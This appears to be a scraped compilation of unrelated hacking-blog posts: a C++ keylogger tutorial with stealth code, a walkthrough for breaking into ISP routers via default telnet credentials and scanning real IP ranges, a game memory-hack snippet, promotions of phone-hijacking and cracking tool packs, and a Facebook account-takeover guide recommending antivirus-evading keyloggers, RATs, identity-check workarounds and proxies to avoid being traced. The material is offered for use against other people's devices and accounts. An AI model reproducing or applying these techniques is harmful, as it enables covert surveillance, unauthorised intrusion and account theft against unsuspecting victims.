How to code keylogger in C programming Language

How to code keylogger in C programming language : C codechamp has brought you a detailed tutorial on how to write a Keylogger code in C programming.

C program of Keylogger or keystroke logger :  Keylogger is a computer program which captures all the key strokes pressed by user in real time. It captures all the keys and write them to some file say log.txt and stores it on computer hard disk. Now sending these logs to emails or FTP address depends upon the type of keylogger that is keylogger is remote keylogger or physical keylogger. Physical keyloggers are useful when you have physical access to that system and can retrieve logs personally. While remote keyloggers can be used from anywhere in the world, the only requirement is that victim must have internet connection. Today we will be writing a C program of Physical keylogger or Keystroke logger which requires physical access of the system. We will be extending our logic in further programs to make it remote keylogger which sends logs to FTP’s and Emails directly. So first of all lets see how simple keylogger program works…

C program of Keylogger or Keystroke logger

Algorithm for writing a Simple Keylogger :

1. Create an Empty log file for storing keylogs.
2. Intercept keys pressed by user using GetAsyncKeyState() function.
3.  Store these intercepted values in file.
4.  Hide the Running Window Dialog to make it undetectable.
5.  Use while loop to make it running in all conditions.
6.  Add Sleep() function to reduce the CPU usage to 0%.

Now let us see the C program of keylogger or keystroke logger which intercepts all the keys pressed by the user and store these pressed keys in log file.

C program of Keylogger or keystroke logger :

#include<iostream>
#include<windows.h>
#include<fstream>
#include<time.h>
using namespace std;

int main()
{
 bool runlogger = true;
 ofstream log;
 //where your logs will be stored
 log.open("C:\\log.txt", ofstream::out);
 //displaying error message when unable to open file
 if(log.fail())
  {
   printf("Error in opening log.txt file\n");
   }
  //Code for hiding running dialog
  HWND hideIt = FindWindow("ConsoleWindowClass",NULL);
  ShowWindow(hideIt,0);
  //Logic for capturing keystokes ........
  ...................

Hacking BSNL Broadband Routers Tutorial by Hackingloops

Hey friends, yesterday we learnt about Hacking websites using SQLMAP and Advanced Persistant threat. Today we are going to learn how to break into BSNL ADSL routers. Hacking BSNL broadband routers is quite interesting, so Hackingloops has came up with tutorial on Hacking BSNL broadband routers Tutorial on how to hack BSNL broadband routers.

Hacking BSNL Routers

Note : This hack works on most of newly ADSL, ADSL2+, ADSL2+M routers.
In this article we are going to hack into router to learn more about it. You might not know that this small and innocent looking modem is actually a "Linux CPU". Lets get into it. First do a nmap scan of this modem. Here is a quick example :

$ nmap 192.168.1.1

Starting Nmap 5.21 ( http://nmap.org ) at 2012-08-31 19:52 IST
Nmap scan report for 192.168.1.1
Host is up (0.052s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE
23/tcp   open  telnet
80/tcp   open  http
5431/tcp open  park-agent

Nmap done: 1 IP address (1 host up) scanned in 0.75 seconds

The http port is open and that is why we are able to access the administration page from http://192.168.1.1/
But apart from http the telnet port is also open. So why not try connecting to it.

$ telnet 192.168.1.1
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.
SemIndia Systems ADSL Router
Login: admin
Password: 
>

 Wow! we are able to login into the telnet daemon of our router using the default username/password of admin/admin.
What next... type in the help command and hit enter. It will list the supported commands somewhat like this

> help

?
help
logout
reboot
adsl
atm
brctl
cat
df
dumpcfg
echo
ifconfig
kill
arp
defaultgateway
dhcpserver
dns
lan
passwd
ppp
remoteaccess
restoredefault
route
save
swversion
wan
serialnum
lan6
dhcp6c
dns6
defaultgateway6
route6
ping
ps
pwd
sntp
sysinfo
tftp

>

 Some of these are the common terminal commands on linux. ps, pwd, ping, cat etc. So lets see the current working directory using pwd.

> pwd
/
>

Listing directories

So we are in the root directory of the filesystem. The ls command is not available. So we have to use another trick to list the directories. And the trick is echo *

> echo *
bin dev etc images lib linuxrc mnt proc sbin usr var webs
>

 Cool! Now those directories are found on any linux system like Ubuntu, Fedora etc. 

/etc/passwd file

You might next want to see the password file /etc/passwd. The cat command is available and can be used for this.

> cat /etc/passwd
admin:7wfiFif6nh6VA:0:0:Administrator:/:/bin/sh
support:MVMCoQ0jGR4Yo:0:0:Technical Support:/:/bin/sh
user:MrYImHrIkIxRI:0:0:Normal User:/:/bin/sh
nobody:685CCPc3VWsbs:0:0:nobody for ftp:/:/bin/sh
>

Thats a linux password file.

Linux version

The uname command is not available so to get the linux kernel version and other details use the following command

> cat /proc/version
Linux version 2.6.8.1 (root@localhost.localdomain) (gcc version 3.4.2) #1 Wed Dec 16 08:35:56 IST 2009
>

So that shows the linux kernel version and some extra details.

Better shell

The above shell can be improved by running the sh command.

> sh


BusyBox v1.00 (2009.12.16-03:08+0000) Built-in shell (msh)
Enter 'help' for a list of built-in commands.

#

So now we get a BusyBox shell. Once again we can type the help command to see what all is available.

# help

Built-in commands:
-------------------
        . : break cd continue eval exec exit export help login newgrp
        read readonly set shift times trap umask wait [ busybox cat chmod
        cp date dmesg echo expr false ftpget ifconfig init insmod kill
        killall klogd linuxrc ln logger logread mkdir mount msh ping
        ps pwd reboot rm rmmod route sendarp sh sleep sysinfo syslogd
        test tftp tftpd true tty umount vconfig

#

This time we have a few additional commands available, like cd, mkdir, date, eval, exec etc and even mount.
A list of all possible commands that Busybox can have is available here.

CPU/RAM Information

The details about CPU and architecture can be found out using the following command

# cat /proc/cpuinfo
system type             : 96338L-2M-8M
processor               : 0
cpu model               : BCM6338 V1.0
BogoMIPS                : 239.20
wait instruction        : no
microsecond timers      : yes
tlb_entries             : 32
extra interrupt vector  : yes
hardware watchpoint     : no
unaligned access                : 1289794
VCED exceptions         : not available
VCEI exceptions         : not available
#

Its an MIPS based 32bit processor. You can compile C programs for this platform using an mips compiler. Check http://developer.mips.com/tools/compilers/ for more information. Also check http://people.debian.org/~debacle/cross/.


RAM information

# cat /proc/meminfo
MemTotal:         5688 kB
MemFree:           424 kB
Buffers:           128 kB
Cached:           1004 kB
SwapCached:          0 kB
Active:           2016 kB
Inactive:          356 kB
HighTotal:           0 kB
HighFree:            0 kB
LowTotal:         5688 kB
LowFree:           424 kB
SwapTotal:           0 kB
SwapFree:            0 kB
Dirty:               0 kB
Writeback:           0 kB
Mapped:           1764 kB
Slab:             2284 kB
Committed_AS:     5172 kB
PageTables:        300 kB
VmallocTotal:  1048560 kB
VmallocUsed:       120 kB
VmallocChunk:  1048400 kB
#

 
So the device seems to have around 6MB of inbuilt memory.
There are many other files in the /proc directory that can be viewed to gather more information about the system.

# cd proc
# echo *
1 10 123 17 191 2 274 275 276 290 3 378 395 4 43 49 5 548 549 6 611 612 7 8 9 accumem buddyinfo bus cmdline cpuinfo devices diskstats driver execdomains filesystems free_pagewalk fs interrupts iomem ioports irq kcore kmsg loadavg locks meminfo misc modules mounts mtd net nvram pagewalk partitions self slabinfo stat sys sysvipc tty uptime var version vmstat
#

Try viewing other files and see what comes up.

Get Current username

The whoami command is not available to the echo command has to be used to find the current username, home directory etc.

# echo $USER
root
# echo $HOME
/
# echo $PATH
/bin:/sbin:/usr/bin
#

Writing files

The var directory is writable. And files have to be created using the echo command.

# echo "ABCDEFGHIJKLMNOPQRSTUVWXYZ" >> /var/happy.txt
# cat /var/happy.txt
ABCDEFGHIJKLMNOPQRSTUVWXYZ
#

Remote files can be downloaded onto the router as well. The ftpget command is available for this. The exact syntax can be found at http://www.busybox.net/downloads/BusyBox.html.
May be you would like to write and compile a C program and then upload it to this router.

Hacking remote routers

You can discover remote routers with a simple nmap command like this

$ sudo nmap --open -sS -sV -T4 117.194.233.1/24 -p 80 -oG - | grep 'open'
# Nmap 5.21 scan initiated Sat Sep  1 11:53:58 2012 as: nmap --open -sS -sV -T4 -p 80 -oG - 117.194.233.1/24 
Host: 117.194.233.4 ()  Ports: 80/open/tcp/////
Host: 117.194.233.12 () Ports: 80/open/tcp//http//micro_httpd/
Host: 117.194.233.35 () Ports: 80/open/tcp//http//D-Link DSL-502T http config/
Host: 117.194.233.40 () Ports: 80/open/tcp//skype2//Skype/
Host: 117.194.233.42 () Ports: 80/open/tcp//http//Embedded Allegro RomPager webserver 4.07 UPnP|1.0 (ZyXEL ZyWALL 2)/
Host: 117.194.233.57 () Ports: 80/open/tcp//http//thttpd/
Host: 117.194.233.61 () Ports: 80/open/tcp//tcpwrapped///
Host: 117.194.233.68 () Ports: 80/open/tcp//skype2//Skype/
Host: 117.194.233.72 () Ports: 80/open/tcp//http//micro_httpd/
Host: 117.194.233.77 () Ports: 80/open/tcp//tcpwrapped///
Host: 117.194.233.104 ()        Ports: 80/open/tcp//tcpwrapped///
Host: 117.194.233.106 ()        Ports: 80/open/tcp//skype2//Skype/
Host: 117.194.233.138 ()        Ports: 80/open/tcp//skype2//Skype/
Host: 117.194.233.141 ()        Ports: 80/open/tcp//skype2//Skype/
Host: 117.194.233.145 ()        Ports: 80/open/tcp//http//SonicWALL firewall http config/
Host: 117.194.233.150 ()        Ports: 80/open/tcp//http//micro_httpd/
Host: 117.194.233.158 ()        Ports: 80/open/tcp//http//micro_httpd/
Host: 117.194.233.160 ()        Ports: 80/open/tcp//http//Linksys wireless-G WAP http config (Name DSL-N10)/
Host: 117.194.233.217 ()        Ports: 80/open/tcp//skype2//Skype/
Host: 117.194.233.227 ()        Ports: 80/open/tcp//http//Apache httpd 2.2.19/

This command just scans all the Bsnl broadband ips to see which are alive and have a port 80 open. If its micro_httpd then its most likely a SemIndia router with BusyBox shell. The "Embedded Allegro RomPager" are Airtel Binatone and Beetel modems being used by Bsnl broadband users.
One way to irritate other users is to restart the remote router by issuing the reboot command in the telnet terminal. But that would not be much fun.

Hack into the LAN

The arp command can be used on the remote router to list its LAN nodes or all the computers in its internal network. Its quite simple

> arp show

IP address       HW type     Flags       HW address            Mask     Device
192.168.1.216    0x1         0x2         ##:##:##:##:##:##     *        br0
192.168.1.33     0x1         0x2         ##:##:##:##:##:##     *        br0

>

The HW/mac address has been hidden for privacy purpose. Now the router tells us who is inside the network.
Note that that arp command shall not be available in the sh shell. It will only be available in the telnet session.
Any of the internal nodes can be pinged 

> ping 192.168.1.216
PING 192.168.1.216 (192.168.1.216): 56 data bytes
56 bytes from 192.168.1.216: icmp_seq=0 ttl=128 time=60.0 ms
56 bytes from 192.168.1.216: icmp_seq=1 ttl=128 time=80.0 ms
56 bytes from 192.168.1.216: icmp_seq=2 ttl=128 time=0.0 ms
56 bytes from 192.168.1.216: icmp_seq=3 ttl=128 time=30.0 ms

--- 192.168.1.216 ping statistics ---
4 packets transmitted, 4 packets received, 0% packet loss
round-trip min/avg/max = 0.0/42.5/80.0 ms
>

From here on it might be possible to do some advanced hacking. The insmod command is available that can be used to load kernel modules.
Hackers would like to make a remote router forward a copy of all network traffic to their own machine so that information can be stolen. The iptables command is available and can be used to do this.

Conclusion

It would be a good idea to protect your own router from such hack attempts from the internet. This can be done by disabling remote logins to telnet, http etc. Login into your configuration page and http://192.168.1.1 and find out how to do that.
This hacking technique is not only applicable to just Bsnl routers. Other isps like airtel are also using similar routers. So it might be possible to try the same thing on them as well. Just need to scan the ip range.
Rest is your creativity. Research and find out what else can be done on such routers.

C++ Hack Tutorial

welcome to Stefan's c++ hack making guide

--------------------------------------------

The programs you will be needing
1. Visual Studio 2003

you can download at http://d4rc.net

--------------------------------------------
Download:  ghb_Public_Source.rar (1.31MB)
---------------------------------------------

Step 1. getting to know the program

1)go to file/new/project/visual c++ Projects/.NET and press ok
2)now you have a basic template of the hack, that you can edit to what you like
3)Form1.cpp will control all of your functions like a warrok hook or message box
4)Form1.h is were you will be adding your coding for the hacks like stamina
5) assemblyinfo.cpp, stdafx.cpp, resource.h you dont need to worry about

-------------------------------------------------------------------------------------------

Step 2. starting the coding for your hack

1)What you want to do is add a new c++ header file. You can do that by clicking on in the upper left hand corner, and click on header file .h
2)once you have added it you need to link it with Form1.h and From1.cpp, by adding #include "c++_header.h" under the #pragma once in both files
3)this is were you will be adding exp. bool Hotkey( int iKey );
4)Now what you want to do is go to Form1.cpp and add these to help you out

[color="#0000ff"]void[/color] *data_process( [color="#0000ff"]void[/color]* pvAddress, [color="#0000ff"]void[/color]* pvBuffer, [color="#0000ff"]unsigned long[/color] m_iSize )
{
if( WarRock_Hook( ) )
{
DWORD dwDummy = 0;
if( WriteProcessMemory( hGameHandle, pvAddress, pvBuffer, m_iSize, &dwDummy ) == TRUE )
{
return pvAddress;
}
}
return 0;
}


HANDLE hkoolzhook = 0;
HWND hWnd = 0;
[color="#0000ff"]int[/color] WarRock_Hook()
{
DWORD proc_id = 0;
if( hnotterhook != NULL )return ([color="#0000ff"]int[/color])hnotterhook;
hWnd = FindWindow( "WarRock", 0 );
if( hWnd == NULL )return NULL;
GetWindowThreadProcessId( hWnd, &proc_id );
return (int)OpenProcess( PROCESS_ALL_ACCESS, false, proc_id );
}

[color="#0000ff"]void[/color] message_box( [color="#0000ff"]char[/color]* sbText, [color="#0000ff"]char[/color]* sbCaption )
{
MessageBox( 0, sbText, sbCaption, MB_OK );
}

Then add this in the c++_header.h

[color="#0000ff"]char[/color] 1 Byte = 8 Bit
[color="#0000ff"]short[/color] 2 Byte = 16 Bit
[color="#0000ff"]int[/color] 2 or 4 Byte = 16 Bit or 32 Bit
[color="#0000ff"]long[/color] 4 Byte = 32 Bit
[color="#0000ff"]float[/color] 4 Byte = 32 Bit
[color="#0000ff"]double[/color] 8 Byte = 64 Bit
[color="#0000ff"]long[/color] double 10 Byte = 80 Bit
[color="#0000ff"]bool[/color] 'True' or 'False'
[color="#0000ff"]void[/color] HEX or Text strings
[color="#0000ff"]char[/color]* char array (Text or strings)

*CREDITS*

Functions = s0biet

guide = me
      
       

Super Bluetooth Hack 2012

If you have lost access to one of your cellphones or 

if you need to hack into others’ cellphone, then this software is for you. 

With this software, you can control other mobile phones.

Super Bluetooth hack allows you to view information 

about battery, network SIM card, read SMS, change network operator, 

control applications and do many more.

Features:
+ Read his contacts
+ Change profile
+ Play his ringtone even if phone is on silent
+ Play his songs(in his phone)
+ Restart the phone
+ Switch off the phone
+ Restore factory settings
+ Change ringing volume
+ And here comes the best
+ Call from his phone” it includes all call functions like hold
+ Connect via Bluetooth & Infrared,etc.
+... and much more.

Free download Super Bluetooth Hack 2012 here

Hack Pack 2012

With this updated compilation you can regain access to the system, 

retrieve a forgotten password to a file, instant messenger, website, email. A lot of useful 

hacking tools, and tweaker tools for internet users.

Check the strength of the local network, a network of Wi-Fi, 

to learn something new for themselves in terms of network design, software, etc. 

A selection of useful both network administrators and ordinary users.

Tools in this package:
+ Administration tools: Hidden Administrator 4.1, Htpasswd Generator 4.1.1, Proxy Finder Enterprise 2.5,
Proxy Hunter 1.4, WinHex 16.1...
+ Recovery tools: Advanced Mailbox Password Recovery 1.9.2.223, Dialupass 3.16, PasswordsPro
3.1.1.0, Product Key Explorer 2.8.6.0, WirelessKeyView 1.36...
+ Sniffer tools: Ace Password Sniffer 1.4, Aircrack-NG 1.1, Angry IP Scanner 3.0, Essential NetTools
4.3.259, SoftPerfect Network Scanner 5.3.2...

Free download Full Hack Pack 2012 here

10 Software Yang Sering Digunakan Hacker

Software apa saja yang sering digunakan hacker? berikut ini adalah beberapa software atau aplikasi yang sering digunakan hacker dalam melakukan pekerjaannya. Software hacker yang bisa Anda pelajari dan tidak digunakan untuk melakukan sesuatu yang tergolong ke dalam tindakan kriminal.

1. Spytech Spy Agen: Tool ini merupakan sebuah aplikasi mata-mata yang akan mencatat segala aktivitas user secara sembunyi-sembunyi. Semua file log atau aktivitas user yang tersimpan dapat kita enkripsi sehingga mudah terlihat. Tool yang satu ini memiliki cara penggunaan yang mudah, cukup dengan menekan Ctrl+Shift+Alt+M, maka tool default ini akan langsung bekerja.

2. Handy Keylogger: Tool ini sama dengan aplikasi hacker lainnya, yakni tak akan bisa dideteksi oleh Task Manager. Setiap aktivitas yang dikerjakan dalam komputer yang telah dipasangi aplikasi ini akan tercatat seluruhnya, sehingga Anda bisa mengetahui apa saja yang dilakukan oleh pengguna komputer ini, misalnya apa saja yang diketikan oleh pengguna, alamat website mana saja yang dikunjungi, dan sebagainya.

3. Dumpacl-dumpsec: Tool yang ini biasa digunakan para hacker untuk melakukan semua pekerjaan yang berkaitan dengan enumerasi. Dengan memanfaatkan Nulls Connections, tool ini mampu menampilkan user account aktif secara detail. Semua aktivitas yang dilakukan oleh sebuah account aktif terekam oleh tool ini. Dulu, sebelum bernama Dumpacl-dumpsec, tool ini memiliki nama Dump ACL.

4. Active Password Changer: Tool ini merupakan aplikasi hacker yang bisa mengubah password yang terdapat dalam komputer manapun yang bisa kita akses secara fisik. Aplikasi ini memiliki beberapa fitur dengan kemampuan kerja yang cukup baik. Beberapa pekerjaan yang bisa dilakukan tool ini, di antaranya adalah melakukan booting dari cd, floopy disk, atau USB. Tak hanya itu, tool ini pun menyediakan CD burner sederhana untuk memburning file pada CD.

5. Cain: Jika kita bisa bertanya kepada para hacker tentang tool yang paling popular di kalangan mereka, boleh jadi jawaban yang keluar dari mulut mereka adalah Cain. Ya, Cain merupakan aplikasi hacker yang serbabisa sehingga sangat digemari oleh para hacker. Cain bukan hanya bisa digunakan untuk melakukan hacking password, melainkan bisa juga untuk mengumpulkan nilai hash dari berbagai sumber.

6. Internet Password Lock

7. Facebook Password Hacker

8. Wifi Password Finder

9. Yahoo Password+key

10. Lophtkrack Administrator

Cara Menghack Account Facebook

Today, I will write yet another tutorial on how to hack Facebook and dealing with a lot of problems along the way. This tutorial will be highly detailed with everything, including what you will need and all the thinking process necessary to successfully hack a Facebook account.
I will be covering:
1) Key loggers
2) Rats
3) Phishing (Well, not really.)
4) Social Engineering
5) How not to get traced


Why am I writing this? Well, I am sick and tired of new members asking the same damn question every single day and it’s annoying as hell!

Not only that, but all the other tutorials regarding ‘How to Hack Facebook’ are outdated and no longer work because they are not including the security updates that Facebook implemented not so long ago.
I have written,
[Tutorial] Why you shouldn’t phish, keylog, SE on Facebook.
(Click here to view)
Bypassing Facebook security [Tutorial] w/ Pictures (Click here to view)
You should check those tutorials out for further information regarding what I am about to talk about in here.
Let’s begin.
I have seen that 99.9% of the tutorials on HF as of now recommend Phishing, keylogging, RATing, and even Social Engineering (SE) as the most notable methods to take over a Facebook account and essentially “hack it”
Before, we go any further. Let me say that Facebook cannot be hacked with a program of any kind. If you see anyone claiming that they have a program to hack Facebook, they are lying.
Now, why are key loggers, phishers, social engineering, and some RATs bad?
-Key loggers only record the keys pressed on the keyboard.
-Phishers essentially do the exact same thing as key loggers, however the slave must do it manually.
-Social Engineering is the trickiest and I would probably say the hardest method of stealing Facebook account nowadays.
-RATs are probably the best road to take if you plan to steal a Facebook account because you have access to Socks5. Socks5 being their own system.
Key logger I recommend: Rapzo Logger v 1.5
               Rapzo Logger v 1.5 ( Public Edition )

                
” Virus Results By Scan4you.net 0/32 “(Paid Host )  

Spoiler (Click to View)

Options

Spoiler (Click to View)

Stealers [6] All Stealers Pure Code – No Drops + Runtime FUD
[#] Firefox 3.5.0-3.6.X
[#] DynDns
[# class="Apple-style-span" style="font-size: 14px;">] FileZilla
[#] Pidgin
[#] Imvu
[#] No-Ip
Features [25]



* Full UAC Bypass & Faster Execution
* Coded in Vb.NET
* Min Req Is .net 2.0 Now A days every pc Have it
* Cool & user friendly GUI
* Easily Understandble
* Encrypt Information
* Encrypt E-mail information
* 100% FUD from all AV’s
* 4 Extentions [ . exe | .scr | .pif | .com ]
* Keylogger support – Smtp[Gmail,Hotmail,live,aol,]
* Test E-mail – is it vaild or not.
* Customize the “To” e-mail address.
* Screen Logger
* Cure.exe to remove server from your Compute
* Usb Spreade
* File pumper – Built-in
* Icon Changer – Preview
* Logs are nice and clear
* Log Letters – ABCD etc.
* Log Symbols – !@#$% etc.
* Log Numbers – 12345 etc.
* Log specific key’s – [F4][F5][TAB][HOME][Pg Dn][Pause Break][Prtsc SysRq].. Etc.
* Hidden really good & invisible
* Send new logs over and over again
* ReadMe.txt – How To Use
* Vedio Tutorial – How To Use
Working on all Windows Operating System’s – [Winxp\vista\W7] — [32 + 64 ] Bit Computers 
  

1) Why that key logger? Well, it’s Free and it works. I tested it.
How to set it up: 
1)(Click here to view)
2)(Click here to view)
After you have done that above, simply build your server. Click Test me to be sure it works. Be sure to select what kind of e-mail you want to use and put the e-mail and the password.

Now, considering that this keylogger is free, you will need to get your file crypted. 

Crypting is essentially making your server or bot, or whatever you want to call it, FUD (Full undetected), being not detected by any Anti Virus or at least UD (Undetected), being only being detected by a few Anti virus.
Why crypt? Well, so your file doesn’t get detected and immediately deleted as soon as the target opens the file.

2) Let’s move on to RATs,

I see the same question all the time, Which is the best/favorite RAT? 
-Based on my personal experience, I can say that DarkComet and Cybergate are the best for RATs being free.
You can find DarkComet here: http://darkcomet-rat.com/
You can find CyberGate here: http://website.cybergate-rat.org/mainpage/
I will not go into teaching you how to set those up because there are already a ton of tutorials on how to do that.
I did a quick search to find tuts and these looked good:
Setting up DarkComet
Setup Cybergate
(Will Publish This Soon As I Get The time)
3) Phishing
-I will not go into phishing since it’s against the rules. 
4) Social Engineering
-Ah, the classic stories of “My friend hacked my facebook” or “How can I hack my friend?” or my personal favorite “How to hack my girlfriend’s Facebook?”

A common mistake by layman who do not know much about the internet is giving information out without actually knowing that they are giving the information out. 

Social Engineering on Facebook seems like a joke considering that you aren’t going to ask the person their password and e-mail for you to log in. Even if they do in fact give you their information voluntarily, it’s pointless.

Why is it pointless? Well, Facebook has become smarter on their security. 
I wrote about the reasons in dept on my other tutorial: Why you shouldn’t phish, keylog, SE on Facebook.
(Click here to view)
Basically, it comes down to this. 

Facebook will detect ‘Suspicion’ on the account that you are logging in and it will not allow you to log in under that account simply because their logs of the original account owner do not match with your IP or the IP your are hidden behind.
1) Suspicion
2) Confirm Identity
4) Confirm identity by identifying the friends on that account.
Now to retrieve back to the very beginning of this tutorial, I said that Key logging, Phishing, Social Engineering, and RATs were the common methods associated with hacking a Facebook account.

I will respectfully correct my mistake and as well as the other tutorials on here. 
1) Even if you do manage to steal the password and e-mail using Keylogs, the problem of suspicion will appear.

2) Even if you do manage to steal the password and e-mail using Phishing, the problem of suspicion will appear.

3) Even if you do manage to crack the password out of your target through Social Engineering, the problem of suspicion will appear.

4) RATs are probably and definitely the best way to go into “hacking” a Facebook account simply because you will have full access to their computers. You can change their info through computers and the problem of suspicion will not appear.
RATs are NOT the only possible way to get in! Keylogging, Phishing, and Social Engineering might work as well. 
I believe that Facebook compares the ranges of IP based on the ISP of the target. Now, if that’s the case…Simply do a whois on the slave using the RAT.

If you do not know what whois is, it’s basically a query that searches where the target is located. Normally you can double click on the slave when they are online on the RAT and see where they are from and look at their IP.

Now, you don’t really need a RAT to tell you where the slave lives or his IP. If you already have his IP or location through other methods such as reverting you’re good to go.

However, if you do not have any information at all what so ever, you can try searching on these sites to revert info about the target.
http://com.lullar.com/
http://www.pipl.com/email/
http://www.spokeo.com
http://www.emailfinder.com
Now, once you have an IP or ISP, or location the next part is looking for a Sock5 to hide behind so Facebook thinks that you are only using a different computer in the same area. You can also spoof the IP, but I will not go into that.
So, after all that work, you still can’t take over their accounts? 

I thought about this method as I was showing a friend through Teamviewer the pictures that Facebook was showing me to identify the target’s friends. And obviously, I was clueless because I did not know of the people.
What did I do? Well, as you can see the picture #4:
1) Suspicion
2) Security question
3) Confirm Identity
4) Confirm identity by identifying the friends on that account.
Facebook provides the names of the target’s friends. So, use that information to essentially bypass the security of identification by searching those names on Facebook search and matching the faces based on the Target’s friends.

Note that will need an extra Facebook account to search, otherwise Facebook does not let you search. Close the ‘Suspicion’ page and log in to your extra or your actual Facebook account and search for the Target’s friends. 

Be sure to notice where your target lives so on the results you can compare whether if the friend is the matching face or not. Be sure to notice the names of the friends as well.
For example, if the name choices are:
George Bush
Adolf Hitler
Barrack Obama
Mohammed Ali
Lee Chang

And the picture given is of an middle eastern descent looking person, you should obviously go with the name that sounds middle eastern. 

Once you match the faces for the identification questions. You should be able to get in without a problem.
To wrap it up,
I will warn you one one important thing, if you do not have access to their e-mails. They will get an e-mail notifying that someone is trying to log in on their accounts and your IP will be shown to them. 

So, what that means is to always hide behind a VPN or a proxy so you can’t be traced back.

Try to take over their e-mails if you want or simply delete the notification e-mails so they do not notice. 


Well, I believe that this is all I have to say.